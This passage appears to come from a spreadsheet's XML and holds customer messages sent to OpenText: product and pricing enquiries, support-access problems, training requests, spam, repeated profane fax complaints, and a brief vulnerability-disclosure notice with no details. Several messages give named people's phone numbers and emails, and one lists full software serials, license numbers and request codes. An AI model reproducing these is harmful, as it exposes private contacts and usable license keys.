    <t xml:space="preserve">We have a requirement for Upgrade of Open Text Imaging Windows viewer &amp; Enterprise Scan through SCCM application deployment._x000D_
Before performing upgrade, We need to take backup and restore of the Scan Client’s configuration.xml file of client’s machine._x000D_
Could you please let us know if there are any command line options to run Export/import of configuration file. _x000D_
We have tried creating a support ticket for the same problem but it couldn't be possible due to access._x000D_
Please let us know the solution._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to contact Julie Hunt 'huntj@opentext.com' as I have been informed she can provide me with pricing information for OMR for Streamserve, as we have a requirement for one of our customer. I have been passed her details from a colleague. Please could you confirm she still works for Opentext, if she has moved on or just on holiday. If she has moved on who is the new account manager for Infor, and what are there contact details. Many thanks in advance, kind regards Dean. </t>
  </si>
  <si>
    <t>open text ticket #1-3448688582</t>
  </si>
  <si>
    <t>our lawfirm base in nigeria , i need your advise and demo about these modules, +234-9083633035</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are migrating our corporate PCs to Windows 10. As we have support contract for Exceed Version 14, we'd like to clarify the best way to update this version to version 15 that supports and has been tested with Windows 10. Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to receive/learn about the release plan for Documentum (7.2) for 2019, when can we expect new releases for 7.2 or higher? I need that information to allocate resources._x000D_
Thank you_x000D_
Dennis</t>
  </si>
  <si>
    <t>In context of Content Management System/Document management System implementation in a government organization, i want to understand and visualize the capability and potential of OpenText ECM. i have a list of requirements regarding ECM implementation, some key requirements are as: Web/Desktop UI, Workflow, Case Management, Case approvers/observers, comment/feedback on document, , e-form processing, Multi-tenancy users, DMS Integration with MS Office applications, DMS e-signature support, Repository monitoring tool, Custom Web UI development. I can provide you the detailed list of requirements as per your requirement._x000D_
Can i have respective Demo/Case Study/Recommendation from your side._x000D_
Quick response will be much appreciated._x000D_
_x000D_
BR</t>
  </si>
  <si>
    <t>Product inquiry regarding ICC 7.0</t>
  </si>
  <si>
    <t>can i get online demo, we are try to find enterprise content management with integration into our ERP with oracle.</t>
  </si>
  <si>
    <t>Anmeldung Live-Webinar Business Center for SAP Solutions am 15.11.2018 16:00</t>
  </si>
  <si>
    <t xml:space="preserve">we tried to contact your office in Dubai, but no reply_x000D_
we need quote and support letter for (KM) tender and we sent several e-mails,also with no reply._x000D_
please provide us your contact in Middle East </t>
  </si>
  <si>
    <t xml:space="preserve">good night, I would like to know what is the cost of the FirstClass platform_x000D_
</t>
  </si>
  <si>
    <t>i'm unable to login into success factors.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for Archive Centre 16 expertise in India for one of the projects we are busy with through a sub-contracting route. Resource can be based out of any location in India. Need availability and pricing. The Archive Centre 16 set up is ready. This is a project to move large content from another application to the current set-up for a new business unit for an Accenture client. </t>
  </si>
  <si>
    <t xml:space="preserve">Query for quotation:\_x000D_
_x000D_
We have a requirement from one of our client to implement Document Management System (EIM). After researching on the internet I have come to the conclusion that OpenText is one of the best and market leader in open source Document Management System. _x000D_
_x000D_
I would here like to inquire about the pricing of your EIM software solution. The total number of users for DMS shall be approximately 250 and concurrent would be max 100. What is the licencing model? What is the pricing for with all advanced features?_x000D_
_x000D_
Looking forward to your response. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am trying to upgrade my dongle however each time I click on the link that I received from support@opentext.com I get an error message that I don't have access to that area. Although I have confirmed my email address 3 times but I keep receiving this message that I need to confirm my email. My dongle ID is G3002088102._x000D_
_x000D_
Please advise._x000D_
_x000D_
Regards,_x000D_
_x000D_
Adeel</t>
  </si>
  <si>
    <t>We are interest to integrate your Brava! viewer to makes our users easy to view, annotate, redact, transform, secure, and publish virtually any type of file—including PDFs, Microsoft® Office documents, image files, CAD drawings, and 3D models. Do u have any SDK to provide. what is the pricing for desktop runtime license and SDK?</t>
  </si>
  <si>
    <t>looking for a ECM system that work with servicenow, SAP general ledger, OCR module.</t>
  </si>
  <si>
    <t>hello I need to know how much does cost your services of OpenText FirstClass, for a homework, thank you very much for your help.</t>
  </si>
  <si>
    <t>I would like to enquire whether Alchemy Search (Release 8.3, Build 500.204) is capable of utilising Adobe DC for previewing files. Currently, when a user attempts to preview a PDF in any given database, they are prompted to install a plugin (which fails to execute and will hang the application for a short period of time)._x000D_
_x000D_
I have attempted to manually copy AuPiPDF4.api into the C:\Program...\Adobe..\plug_ins folder but this has yielded no improvement._x000D_
_x000D_
Any suggestions in this space would be greatly appreciated.</t>
  </si>
  <si>
    <t>SN</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to inquire about upgrading from Streamserve 3.0 to Version 5 - or the latest version that is compatible with our ERP system Movex ._x000D_
</t>
  </si>
  <si>
    <t>Здравствуйте, предлагаю поднять вашему сайту авторитетность. ТИц10 500руб. ТИц20 1000руб. ТИц30 1500руб. ТИц 50 2000руб. Тиц100 3000руб.</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
I am Carl James M. Raymundo, a fourth-year undergraduate student from De La Salle University-Manila, taking up Computer Science. We will be having our practicum between the 3rd of January 2018 and 19th of April 2018. It would require us to render 320 hours of service. With this said, may I ask if your company currently has an internship program? If so, what are your requirements?_x000D_
_x000D_
I am looking forward to hearing from you about the available opportunities that you offer._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Carl James M. Raymundo_x000D_
09177790109_x000D_
carl_raymundo@dlsu.edu.ph</t>
  </si>
  <si>
    <t>Hi,_x000D_
I've created an account to apply for a job, however I received no confirmation of the job application going through, I've recieved no email, and I'm unable to log in to my new account. When attempting to create an account again, an error message advises that the email address already has an account.</t>
  </si>
  <si>
    <t>zzzzz内容zzzzz</t>
  </si>
  <si>
    <t>I need aupl Kulp</t>
  </si>
  <si>
    <t>We would like to understand the cloud licensing model. Kindly revert back to me</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have a licence for Gupta Team Developer 3.1 from 2004 and now I have to change my laptop._x000D_
When I try to register the product I receive Product Activation Key but when I try to activate the product I receive the message: Specified product activation key is not a valid key. Please specify valid Gupta Product Activation key. _x000D_
As I tried to reinstall many times last days I received many keys but I receive the same message for all the keys._x000D_
Please help me to activate the licence. _x000D_
Thank you in advance,_x000D_
Sarina Alcea</t>
  </si>
  <si>
    <t>license type and pricing</t>
  </si>
  <si>
    <t>Hi vas</t>
  </si>
  <si>
    <t>Registered user/owner of Encase 8.05 but not current in maintenance - can I still access the old Encase customer portal for Enscripts and other downloads?</t>
  </si>
  <si>
    <t>HI, I have installed BIRT ihub on my Windows 10 machine.  The installation was successful.  I know Windows 10 is not in the support list of OS, however I am only faced with one issue and I think I can configure it in Windows 10 if someone told me how.  I am getting an error accessing localhost at port 8700 "Canot reach this page - Make sure that you’ve got the right web address: http://localhost:8700".  Any help would be very much appreciated.  Regards,  Pet</t>
  </si>
  <si>
    <t>Здравствуйте, могу продвинуть ваш сайт, выведу в топ 10 гугл и яндекс, за 6 месяцев.</t>
  </si>
  <si>
    <t xml:space="preserve">Our digital innovation team would like to evaluate your offerings on Digital experience platform. _x000D_
Is that possible to come up to our office for discussions and a demo  for this requirement?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in exploring OpenText Exstream product and see if it will meet the needs of an automated solution that we would like to implement. We would like to have a session with your product experts to understand its capabilities, licensing model/costs etc. </t>
  </si>
  <si>
    <t>What is the current version of HostExplorer?  What version(s) of TLS does it support?</t>
  </si>
  <si>
    <t>Looking for information on purchasing Teleform.  We have an older version from a previous vendor and need to upgrade.  Thanks.</t>
  </si>
  <si>
    <t>In the interest of responsible disclosure, we are notifying you about potential discovered vulnerabilities in MediaBin. This vulnerability allows the ability to execute arbitrary code. We would like to share the details with you.  Let me know if you prefer for us to send it encrypted with your PGP key, send it using our secure email system, or simply using conventional email._x000D_
 _x000D_
Feel free to reply with any questions you might have.</t>
  </si>
  <si>
    <t>My Support - I have an account but am not able to submit a support ticket._x000D_
I have an issue with one of my users and need help from the support desk</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a sales contact and to possibly set up a demo of your EDR solution.  </t>
  </si>
  <si>
    <t>It’s now 6:05 AM_x000D_
Every time your annoying company calls us I am going to send this message: You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  40 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>I'd like to get more info about Tableau TX1 is a forensics duplicator (and its adapters, cables etc), EnCase Forensics 6 software and trainings about EnCase software.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Do you have any latest version IRM for PDF to comply with Acrobat Pro DC version 2019.008.20074? The error message keeps on showing that IRM doesn't support and we need to contact the company. Looking forward to your soonest response. Have a good day!</t>
  </si>
  <si>
    <t xml:space="preserve">I received the below email from OpenText:_x000D_
"Registration Confirmation_x000D_
Dear Horseware IT, _x000D_
Congratulations! You now have access to the Online Support Resources available through My Support._x000D_
•	Your User ID: it@horseware.com_x000D_
•	Welcome and FAQ: _x000D_
Thank you for registering with OpenText. To complete your registration, please verify your email address by selecting the confirmation link: _x000D_
Confirm Registration "_x000D_
i clicked the Confirm Registration link but when i go back into MySupport i still get the message:_x000D_
"Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Request confirmation email"_x000D_
_x000D_
Can you help us get logged into MySupport?_x000D_
_x000D_
Thanks_x000D_
Michael_x000D_
</t>
  </si>
  <si>
    <t>W-9. Could we please get a W-9 for you? You can email it to the above email address. Thank you.</t>
  </si>
  <si>
    <t>Hi There, _x000D_
_x000D_
We are currently assisting one of your clients in developing their DR strategy. A part of the solution we need to confirm if there are any supported Disaster Recovery implementations for OpenText eDOCS. Hoping to engage with one of your experts to discuss this as soon as possible. Please let me know who may be able to help._x000D_
_x000D_
Thank you, _x000D_
Cassandra</t>
  </si>
  <si>
    <t>We are beginning the search for a new web CMS and starting an RFP process.</t>
  </si>
  <si>
    <t>Hi there, _x000D_
Are you able to direct me to the account manager for Ontario? I've received a quote but seemed to lost contact with the sender.....looking to confirm net 30 days indicated on the quote vs. net 45 days which is already set up on our system.  Thanks.</t>
  </si>
  <si>
    <t>New fax line needed</t>
  </si>
  <si>
    <t>We just switched over to Rightfax Connect and away from our physical server. I was told that I need to give notice for the 8 fax channels to be removed from our maintenance so we aren't charged for them at renewal time. How do I initiate this?</t>
  </si>
  <si>
    <t>I need to know what the current process is for renewing my EnCE.  It expires in February 2019, so I need to start working on renewal.  If you could send me information on renewal requirements and process, that would be great.</t>
  </si>
  <si>
    <t>I have some people that are interesting in the 3-3730 course on 11/12 and 3-7630 on 11/14, what is the latest we could get registered? Is there course materials that would need to be sent?  Assuming we would access a Remote Desktop or virtual desktop for this training using the Virtual classroom??  We are working on the approvals internally for the courses and running into some challenges with vacations and other conflicts.  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Fax to cloud solutions </t>
  </si>
  <si>
    <t xml:space="preserve">Senior Manager </t>
  </si>
  <si>
    <t>We are interested in establishing a database/document management portal which can store 5000+ reports (mostly in PDF) to be accessed by users at various locations globally. We will also need some management (log of activities, controlled access, etc.) and search (e.g., against certain key words) functionalities. Would like to learn more about how OpenText can help._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Password to be reset - no e-mail received</t>
  </si>
  <si>
    <t>Dear, we have the opportunity to implement the OpenText Document Management System and integrate with SAP. We are new in OpenText, since we have worked with Documentum before. What I'm interested in, what is needed from the licenses to do this job (I'm a little confused about what the OpenText Content Suite Platform is what the OpenText Document Management is  and what is OpenText Extended ECM for SAP Solutions)._x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t>We currently are running 10.5 version of Rightfax.  We are looking to upgrade our current version.  Is there a path to go from 10.5 to 16?  Is 10.5 and 16 compatible with Windows 2016 Server?   Is it possible to do a new install of RightFax 16 and migrate settings from the old 10.5 server?</t>
  </si>
  <si>
    <t>I am trying to get access to MySupport to put in a ticket in regards to a RightFax question. However, I have been asked to confirm my email 3 times now each time I try to access it. Our server ID for RightFax is 09509-12204.</t>
  </si>
  <si>
    <t>Hello OpenText. I'm working on behalf of a Supplier in the building trade who urgently need to create an EDI interface with their Customer, National Merchant Buying Society (NMBS) who are on your /OpenText network. The message flow will be Tradacom9 Invoices and Credits from my client, through yourselves to NMBS. Could you please provide me with the monthly costs for your trading partner packages? I'm told these consist of a dedicated EDI mailbox + an amount of inclusive data traffic. I also need to know your unit KC price will be for data in excess of what's included per month in the inclusive package. I need this information urgently so would appreciate it if someone could get back to me today if possible. Thank you.</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
We planning to take training for one of the course 1-7610 Exstream Designer 16.3. We tried to raise the purchase order for the same using training portal checkout. But it is asking for the (Purchase Order) PO number. Please suggest us where we are missing ._x000D_
_x000D_
Since last one month we are trying to do the payment . The learner is from India and we want to pay the amount in INR (Indian rupees.)_x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Regards,_x000D_
Durgaprasad.A,_x000D_
Mobile No: +91 - 9912520006</t>
  </si>
  <si>
    <t>we are an international law firm with over 200 lawyers and offices in IL, US and UK. We are looking foe document management system for our firm and would like to get an offer from you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested to  Office 365 Users?_x000D_
_x000D_
We have 1102 buy leads of Office 365 Technology Customers Records from Texas._x000D_
_x000D_
We can provide Test file without any obligations. let me know your interest on the same_x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am writing because we have a client that uses Open Text and we are doing an integration but I can't find the information in the api referring to the version Content Server 10.5 to make a query to the API REST by categories and attributes._x000D_
_x000D_
As we don't own the solution we don't have access to the support part. Please, can you help us?_x000D_
_x000D_
Thank you very much,_x000D_
Adrian</t>
  </si>
  <si>
    <t>opentext edocs</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
I am employed as a Digital Forensic Investigator with Lancashire Constabulary. I have been instructed by my manager to book on to DF210 (formerly CF2) course.  I note that a prerequisite is DF120 (formerly CF1).  I have not been on this course.  I have experience in using EnCase to image and process E01 files.  I have limited experience in interrogating the evidence and report writing.  Currently going through in house training and guidance.  In addition I am booked to attend a Control-F, Foundation in Securing Computer Evidence.  Will this suffice as a replacement for my attendance on the DF120 course?_x000D_
_x000D_
Please advise._x000D_
_x000D_
Thanks _x000D_
_x000D_
Matt_x000D_
</t>
  </si>
  <si>
    <t>ShipNet is evaluating to migrate our current Team Developer, TD62 environment, to .Net platform. We are looking for a contact person that can provide us with necessary information of the best practice on how to do the migration process. What is the effort?, explain the limitations, and what will be the outcome of the migration. Will the migration produce source code  that  can be maintained in .Net, or is it still to be maintained as SAL in TD? _x000D_
_x000D_
Regards,_x000D_
Dag Berger</t>
  </si>
  <si>
    <t xml:space="preserve">Dears_x000D_
_x000D_
I want to register a passport and i would like to know the available schedule at London or Birmingham_x000D_
_x000D_
cheers_x000D_
Assem </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Je suis Anthony Bochert consultant EDI-B2B indépendant et je vous contacte pour un besoin d'archivage facture._x000D_
Pour le compte de l'un de mes clients grand compte, je recherche une solution d'archivage à valeur probante, pour servir un projet important de dématérialisation fiscale des factures._x000D_
Proposez-vous ce type d'offre en mode LICENCE &amp; en mode SAAS ? _x000D_
Si oui, je vous transmettrai les premiers détails techniques du besoin_x000D_
Je vous remercie par avance pour votre retour._x000D_
Bien cordialement,_x000D_
Anthony Bochert._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
 _x000D_
I hope you are the right person who handles data acquisition in your organization_x000D_
We have compiled a data base of  Amazon PLM user base?_x000D_
 _x000D_
Other Technology: - CRM, ERP, BI, Networking, Big Data, Accounting Software, Payroll Software, Collaboration, Virtualization, Security Software, SCM, EPM, ECM, PMS, BPM, Risk Management Software, Workflow Management Software, Inventory Software and and many more._x000D_
 _x000D_
To provide you with accurate counts and samples provide us your requirement._x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>It’s now 9:20 PM_x000D_
 Every time your annoying company calls us I am going to send this message:_x000D_
Fuck off. _x000D_
You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  32 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>It's now 9:20 PM_x000D_
Every time your annoying company calls us I am going to send this message:_x000D_
Fuck off. _x000D_
You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  29 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I received a question from a customer if it is possible to bring their on-prem OpenText Capture Center to Azure._x000D_
In the Azure Marketplace I can see the options to install the OpenText Content Server and the OpenText Process Suite. But that is, in my opion, not the same product as the OpenText Capture Center._x000D_
_x000D_
Can somebody provide me more info about this topic?_x000D_
_x000D_
Thanks in advance.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Eoin Duggan and I'm a solutions architect with Athora Ireland. Athora is investing in a workflow solution or business process management suite and issuing an RFP in the coming weeks._x000D_
_x000D_
For context, Athora was founded in 2014 for the specific purpose of focusing on the European insurance market. We manage over €10 billion of assets for approximately 300,000 policyholders in Europe and have 400 employees in Germany, Ireland, the United Kingdom and Bermuda. We’re planning significant growth by M&amp;A over the coming years._x000D_
_x000D_
If you would like to be involved we can setup a 30 min introductory presentation. A high level agenda might include:_x000D_
_x000D_
•	Company Basics_x000D_
o	Company Overview_x000D_
o	Products Offered_x000D_
o	Implementation Methodology_x000D_
o	Client and Project History_x000D_
o	Support Frameworks and Training Services_x000D_
o	Cost Model_x000D_
•	Application Information_x000D_
o	Orchestration engines_x000D_
o	Human workflow management_x000D_
o	Business intelligence and analysis tools_x000D_
o	Complex-event processing_x000D_
o	Automated business process discovery_x000D_
o	Rule engines_x000D_
o	Business rule management_x000D_
o	Process metadata repository/registry_x000D_
o	Simulation and optimization tools_x000D_
o	Integration tools_x000D_
o	Portal/other user interface technology_x000D_
o	Enterprise content management technology_x000D_
o	Collaboration technologies_x000D_
o	Case management_x000D_
_x000D_
Regards,_x000D_
Eoin</t>
  </si>
  <si>
    <t>How to access your Entity Extraction model does it support API calls _x000D_
Need More information and documentation</t>
  </si>
  <si>
    <t>How to access your sentiment analysis model can i call the model through api is custom sentiment analysis possible._x000D_
NEED MORE INFORMATION AND DOCUMENTATION</t>
  </si>
  <si>
    <t>It's 8:50PM._x000D_
Every time your annoying company calls us I am going to send this message:_x000D_
Fuck off._x000D_
You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  29 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>Every time your annoying company calls us I am going to send this message:_x000D_
Fuck off. _x000D_
It's 8:46PM._x000D_
You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  30 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t xml:space="preserve">Seeking information on Documentum </t>
  </si>
  <si>
    <t>Every time your annoying company calls us I am going to send this message:_x000D_
Fuck off. _x000D_
It's 8:25PM._x000D_
You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  29 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>Every time your annoying company calls us, I am going to send this message:_x000D_
Fuck off. _x000D_
You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  28 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>Can text analytics -&gt; Entity Extraction, Sentiment Analysis be performed</t>
  </si>
  <si>
    <t>Every time your annoying company calls us I am going to send this message:_x000D_
Fuck off. _x000D_
You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  26 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>Every time your annoying company calls us I am going to send this message:_x000D_
_x000D_
Fuck off. _x000D_
You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  25 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
 _x000D_
uns liegt eine Kundenanfrage für folgendes Produkt vor:_x000D_
_x000D_
wie gestern telefonisch besprochen benötige ich für unsere mit der Bewirtschaftung unserer Schulgebäude beauftragten zukünftigen Eigenbetriebe ein Angebot für folgende DMS-Lösungen, ausgehend von einem zentralen Server und ca. 45 Benutzern bei ca. 25 gleichzeitigen Zugriffen:_x000D_
 _x000D_
•	Opentext (vormals Ixos)_x000D_
 _x000D_
Ein Testbetrieb ist zunächst nicht geplant. _x000D_
 _x000D_
Kunde: _x000D_
Kreis Offenbach _x000D_
_x000D_
_x000D_
Können Sie uns hierüber bitte ein Händlerangebot mit Aufführung eventuell anfallender Versandkosten erstellen. _x000D_
_x000D_
Vielen Dank für Ihre Unterstützung. Wir freuen uns auf Ihr Angebot._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Best regards_x000D_
 _x000D_
Sandra Wiesböck_x000D_
Software Inside Sales Adobe / Grafik / Standardsoftware_x000D_
_________________________________________________________________x000D_
 _x000D_
COMPAREX AG_x000D_
Friedensstraße 9_x000D_
D-85586 Poing_x000D_
_x000D_
Phone:    +49 8121 982 - 155_x000D_
Fax:        +49 8121 76566_x000D_
E-Mail:    sandra.wiesboeck@comparex.de_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Every time your annoying company calls us I am going to send this message:_x000D_
Fuck off. You are ringing our business line (Sydney, Australia) every 20 minutes with a fax machine -  23 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>Every time your annoying business calls us I am going to send this email:_x000D_
Fuck off. You are ringing our business line every 20 minutes with a fax machine - Sydney, Australia. 23 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>Fuck off. You are ringing our business line every 20 minutes with a fax machine (Sydney Australia). 23 calls so far today. You were doing this last month as well and it is driving us mad. This is despite you promising to remove our number from your dialling lists. PLEASE confirm you have REMOVED our number.  International: +61 2 9904 1722  Local: 02 9904 1722.</t>
  </si>
  <si>
    <t>Hello, we are forget our admin password. Could you please help us how can we change our admin password?</t>
  </si>
  <si>
    <t>Interested in pricing/info on RightFax and Healthcare Direct inbox service</t>
  </si>
  <si>
    <t>Exploring EDI Services for our US Operations.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day Mark Barrenechea,_x000D_
_x000D_
Opentext came up in discussions with our group of senior executives from US universities and colleges looking to procure specific services at our upcoming University Leadership Summit in February 2019. Here is the setting for each attending solution provider: _x000D_
_x000D_
•	20-24 face to face, qualified meetings with our buyers. Save not only money but -just as important- time._x000D_
•	Vet through our list of Delegates and their purchasing priorities, be selective as to who you wish to meet with. We focus on quality of engagement, not quantity, thus attendance is restricted to C level executives only (i.e. Presidents, CEOs, Managing Directors, etc.)_x000D_
•	Ability to access the right executives from our group of Delegates, at a time when they are procuring your products and services._x000D_
•	As we are very diligent on whom we partner with, I wanted to better understand your firm's expertise in the space to determine the fit. Understanding that the program is right around the corner, let me know if you would like to be considered as a qualifying Service Provider and we could discuss our criteria over the next days._x000D_
_x000D_
Regards, _x000D_
_x000D_
Madison Frensworth_x000D_
Senior Marketing Manager - Higher Education_x000D_
ME Group_x000D_
madisonf@me-eventsgroup.com_x000D_
</t>
  </si>
  <si>
    <t>We would like to renew the support contract, please quote the price to me.  Thank you very much.</t>
  </si>
  <si>
    <t>I need to know if there is an upgrade path for Alchemy, we are not on Version 9 Build 200.203</t>
  </si>
  <si>
    <t>need help trying to access MySupport.  i get a confirmation e-mail saying i can access MySupport, but, when i click on the link, i get a message about "Almost there, need confirmation".  click on the send confirmation, get e-mail, click on the confirm registration, log in, click on request access to My Support, and i'm asked questions about Product Line, Co-Worker's name.  want to download OpenText Exceed Secure Shell 15.0.5. _x000D_
_x000D_
End User Company: 10475755 - GE Transportation_x000D_
Reseller/Distributor Company: 10060209 - SHI International Corp._x000D_
Sales Order Number: 44257_x000D_
Delivery Number: 8000032018_x000D_
System Unique ID (SUID): 47817-12689_x000D_
_x000D_
(don't have a desk phone, so, e-mail is the only communication)._x000D_
_x000D_
please help,_x000D_
_x000D_
thanks,_x000D_
_x000D_
pete.</t>
  </si>
  <si>
    <t>Have not received confirmation email for registering for "Whats new with DM 16.4?"</t>
  </si>
  <si>
    <t xml:space="preserve">Product License Key Request_x000D_
xPresso for InDesign for Mac_x000D_
Version 4.6_x000D_
.  I would like to reclaim two xPresso license keys that are no longer being used and assign it to different machines:_x000D_
_x000D_
OLD LICENSE TO RECLAIM:_x000D_
_x000D_
Serial #: 5285B9D8A8CD1D271105518AF341F83D_x000D_
License #: D9A4E07B270F70527F6D5755EEA31CF7CDD68460B1C6D63319370440E49CF8DC1DCEA9E56B17491D_x000D_
Request Code: 2A9202219C86D4B77E85EF947DA278B097DED592C7E9E14EDCE0C9666EF836C5_x000D_
Version: xPresso 4.6 for InDesign (Mac)_x000D_
_x000D_
Serial #: 5285B9D8A8CD1D271105518AF341F83D_x000D_
License #: D9A4E07B270F70527F6D5755EEA31CF73EE3A8FE4B4423720CB9C908A645B821172BA94076334119_x000D_
Request Code: 2A9202219C86D4B77E85EF947DA278B0BCDD9E796038D23279C0C953174D824F_x000D_
Version: xPresso 4.6 for InDesign (Mac)_x000D_
_x000D_
_x000D_
_x000D_
NEW LICENSE INFORMATION:_x000D_
_x000D_
First Name: CONAPRJ_x000D_
Last Name: ML0159045_x000D_
Email: April.Johnson@capgroup.com_x000D_
Serial #: 5285B9D8A8CD1D271105518AF341F83D_x000D_
Request Code: 2A9202219C86D4B77E85EF947DA278B004DF72C463A73D9EE153B01EE4D46BCF_x000D_
 _x000D_
First Name: CONKEIR_x000D_
Last Name: ML0159026_x000D_
Email: Keith.Rosborough@capgroup.com_x000D_
Serial #: 5285B9D8A8CD1D271105518AF341F83D_x000D_
Request Code: 2A9202219C86D4B77E85EF947DA278B0053450AC1410C0221A55D491E35330A4_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric Urquilla_x000D_
Capital Group_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon, _x000D_
 _x000D_
Hope all is well. I have been commissioned by the Canadian Arab Business Council (CABC) to compile a master list of people and businesses interested in membership with CABC. _x000D_
_x000D_
The Canadian Arab Business Council is a Not for Profit organization focused on establishing continuous business operations between Canada and the Arab World. CABC aims to enable member companies doing business in Canada and the Middle East and North Africa (MENA) region by increasing awareness about the prominence of international trade and investments. _x000D_
_x000D_
We act as an effective advocate for government policies to enable companies to set up operations in Canada and in the Arab states, as our membership includes firms currently doing business, or considering doing business, in the region.  We have continued to promote and facilitate these trades and investments; help our members by providing access to decision makers, insights of economic, social, and political developments in both Canada and the Arab States._x000D_
_x000D_
In the event this is of interest to you, please subscribe to our mailing list so that the CABC can provide you periodic updates on exclusive commercial opportunities in the region._x000D_
_x000D_
Taken as a whole, the economy of the MENA region is currently valued at around US$3-trillion, which is more than 50-per-cent larger than Canada’s economy. The vast majority of the region is investing significantly in innovation to diversify and modernize national economies. The International Finance Corporation (IFC), the private-sector lending arm of the World Bank, plans to increase lending to the region this year by around 20 per cent to US$2-billion, with a focus on infrastructure spending, particularly for renewable energy projects. Canadian companies have much to offer a region looking to innovate in key sectors such as energy, infrastructure, health and education. _x000D_
Likewise, innovative start-ups in the region are looking for Canadian investment and partners to advance their </t>
  </si>
  <si>
    <t>Hello,_x000D_
I am writing to inquire about an email we received from your system regarding multiple document processing failures. The subject line reads: FANAT | 1-3452249459 | Fanatics Production | 180 Message Failure from BRANDED LOGISTICS [12:9706901400] | Moderate_x000D_
I would like to know why we are receiving this email, what needs to be done to ensure the proper fulfillment of these orders, and how we can avoid this failure for the future._x000D_
If you require any further information regarding the email we received, please advise._x000D_
Regards,_x000D_
Marshall</t>
  </si>
  <si>
    <t>Trying to open a support ticket and unable to do so to report an installation issue on a new server for Inovis TrustedLink Enterpritse Windows Server Edition v 6.2.  The Inovis TL Services service will not start.  Always comes back with an error that it's timed out.</t>
  </si>
  <si>
    <t>We would like to send an RFP to OpenText on 11/5.  Who and where would be the best place/contact to send the RFP to electronically?</t>
  </si>
  <si>
